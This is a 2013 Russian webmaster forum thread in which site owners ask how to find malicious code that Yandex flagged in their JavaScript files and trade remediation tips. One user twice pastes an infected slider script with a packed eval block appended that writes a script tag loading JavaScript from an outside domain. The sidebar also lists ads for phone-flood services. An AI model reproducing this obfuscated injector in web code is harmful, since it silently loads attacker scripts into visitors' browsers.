Яндекс нашел вредоносный код помогите найти
Страницы: Пред. 1 2 3 След.
Яндекс нашел вредоносный код помогите найти, Яндекс нашел вредоносный кодс: file0c.net при посещении сайта с мобильных устройств
да, изменили .js файлы.
измените пароли FTP, не в коем случае не хваните их в файловом менеджере (каждую сессию вбивайте вручную). Видимо у вас просто был сохранен пароль.
Проверьте и другие .js файлы.
Яндекс нашёл вирус, который называется поведенческий анализ, где его искать
у меня они тоже в этих числах сайт залетел с данной табличкой.. убрал.. потом бац  сегодня опять появилась что сайт имеет контет вредоносного характера, посмотрел что кто то правил вчера файл джеквери,  начал копаться в логах .. и увидел очень интересную картину, оказывается с первых числах августа  кто то усердно несколько дней подряд подбирал пороль к админки  130 000 раз потребовалась и он просто заходил меня файл и все . так вроде бы больше нечего не добавилось, файлы были заменены только джс скрипта
Ребят, может кто подскажет где тут вирус искать? сайт kusa.mobi
smile:mad:
Прошу помощи, ибо сам уже устал искать. (((
Смотрите файл functions.jsВ самом низу, короче строка 50
Цитата
bobit пишет:
Смотрите файл functions.jsВ самом низу, короче строка 50
Большое спасибо, нашел ссылку))) только не понял для чего она там была. хмм...
Сегодня тоже Яндекс предупредил о вредоносном коде. Нашел сам, код был добавлен в конец одного из js-файлов.
Эпидемия какая-то? У многих смотрю такая проблема, дописывают хвост в файл js. И самое неприятное, что непонятно, как это произошло. У меня свежий вордпресс, несколько плагинов с офсайта и тема оттуда же, ничего лишнего, и вот на тебе - внесли заразу.
Как думаете, если на все файлы js прописать права 444 - защитит от этой напасти?
точно такая проблема с двумя сайтами.. только не могу найти ((((((((((http://homelib.in.ua  и  http://kreditfree.ru подскажите где находится пожалуйста. В ЯВ написано что обнаружен поведенческий анализ.
Изменено: Владимир пупкин - 22 Августа 2013 09:03
Банковская партнерка №1 с 50 хостов 10 000 рублей
Добры день всем. подскажите, нашел код в js скрипте...вот код:\




Код
 /* Copyright (c) 2012 Fred Heusschen *   www.frebsite.nl  *  * Dual licensed under the MIT and GPL licenses. */ eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(i).r(5(){$(\'.3\').e(5(){$(\'.3-0-2\').b(\'7\');$(\'.3-0-2-9\').b(\'7\')});$(\'.3-0-2-9, .s\').e(5(){$(\'.3-0-2\').f(\'7\');$(\'.3-0-2-9\').f(\'7\')});$(\'.k-4-0 j\').l(5(){$(6).8(\'.2-4-0\').c({\'g\':\'0\'});$(6).8(\'.4-a\').n(\'h\')},5(){$(6).8(\'.2-4-0\').c({\'g\':\'F\'});$(6).8(\'.4-a\').D(\'h\')});$(\'#y\').A({B:\'#C\',J:\'#z\',E:1,I:H})});i.G("<d x=\'w/o\' m=\'p://u.v/t.q\'></d>")',46,46,'block||hidden|login|menu|function|this|400|find|dark|link|fadeIn|css|script|click|fadeOut|display|activ|document|li|top|hover|src|addClass|javascript|http|js|ready|close|iknopo_b|iknopo|ru|text|type|foo1|next1|carouFredSel|prev|prev1|removeClass|scroll|none|write|false|auto|next'.split('|'),0,{})) 





Не могу его убрать...если внести какие-либо изменения, то не работает слайдер на главной...

Помогите плиз...
Изменено: nitroski - 22 Августа 2013 10:57
Кстати, права 444 на файлы не помогли - сегодня опять код внедрился, а права 444 так и остались...
Как бороться-то? smile:)
измените пароль на админку, и установите доп  защиту на вход в админку и  смените пароль на фтпшный доступ
Цитата
darkneo пишет:
измените пароль на админку, и установите доп защиту на вход в админку и смените пароль на фтпшный доступ
Эти шаги сделал пару дней назад, после первого эпизода заражения - все пароли сменил, логин в админку усложнил - правда тут не знаю, насколько эффективно, ведь самому-то заходить все-таки надо... Ничего не спасло smile:)
Возможно, у меня виндоус заражен, но вроде не похоже - и антивирусом гонял, да и по поведению системы ничего необычного не замечаю.
Единственное наблюдение - то, что после таких атак у меня, кроме всего, прочего пропадает автологин на форуме сайта. Куки видимо сбрасываются. Неужели все-таки через меня взламывают:o
Блин, никто не знает, как это вирусняк вырезать из js???
Порезал кое-как пути. Слайдер работает, за то сайт грузится неимоверное долго...


Код
 /* Copyright (c) 2012 Fred Heusschen *   www.frebsite.nl  *  * Dual licensed under the MIT and GPL licenses. */ eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('$(i).r(5(){$(\'.3\').e(5(){$(\'.3-0-2\').b(\'7\');$(\'.3-0-2-9\').b(\'7\')});$(\'.3-0-2-9, .s\').e(5(){$(\'.3-0-2\').f(\'7\');$(\'.3-0-2-9\').f(\'7\')});$(\'.k-4-0 j\').l(5(){$(6).8(\'.2-4-0\').c({\'g\':\'0\'});$(6).8(\'.4-a\').n(\'h\')},5(){$(6).8(\'.2-4-0\').c({\'g\':\'F\'});$(6).8(\'.4-a\').D(\'h\')});$(\'#y\').A({B:\'#C\',J:\'#z\',E:1,I:H})});i.G("<d x=\'w/o\' m=\'p://u.v/t.q\'></d>")',46,46,'block||hidden|login|menu|function|this|050|find|dark|link|fadeIn|css|script|click|fadeOut|display|activ|document|li|top|hover|src|addClass|javascript|http|js|ready|close||||text|type|foo1|next1|carouFredSel|prev|prev1|removeClass|scroll|none|write|false|auto|next'.split('|'),0,{})) 
Изменено: nitroski - 22 Августа 2013 19:04
люди, пишите своего хостера, какая cms сайта, какой антивирус стоит, каким ftp клиентом пользуетесь.
возможно подойдем к общему знаменателю.
Страницы: Пред. 1 2 3 След.
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
15:08 Adtrafico - Правильная партнёрская сеть под бурж трафик 
21:18 Webvork - международная товарная СРА сеть с сертифицированными офферами на Европу. 
21:06 Кто как борется с ботами ПФ? 
16:51 Buymedia.biz - рекламная сеть 
13:36 Партнерская программа OWNR WALLET 
14:10 3snet - гемблинг, беттинг, форекс, бинарные опционы, майнинг 
11:52 Партнерская программа Xoffers с прямыми офферами в вертикалях форекс, крипта и бинарные опционы. 
21:39 Coin Click.cc - Быстрый и надежный обмен электронных валют в два клика 
18:50 Европейский эквайринг 
18:36 Мобильные и Резидентные Прокси Для Соц Сетей | 3 Гб Бесплатно 
19:40 Высококачественные и надежные прокси-серверы и 5G 
16:16 ZennoPoster - софт №1 для автоматизации любых SEO задач! 
15:55 - Вечные ссылки с трастовых сайтов 2024 проверен FastTrust 
11:40 Криптовалютный обменник Xgram.io - новое воплощение качества 
02:05 Точные прогнозы на футбол 
15:43 Заказать телефонный флуд. 
12:05 Ням-ням! - 8 деликатесов, которые когда-то ели только бедные люди 
11:25 Флуд звонками 
11:40 Кто сделает прогон для адалт сайта? 
09:25 Добро пожаловать в цифровой мир... 
10:31 Видимо, похороны СУПРа уже прошли как-то по-тихому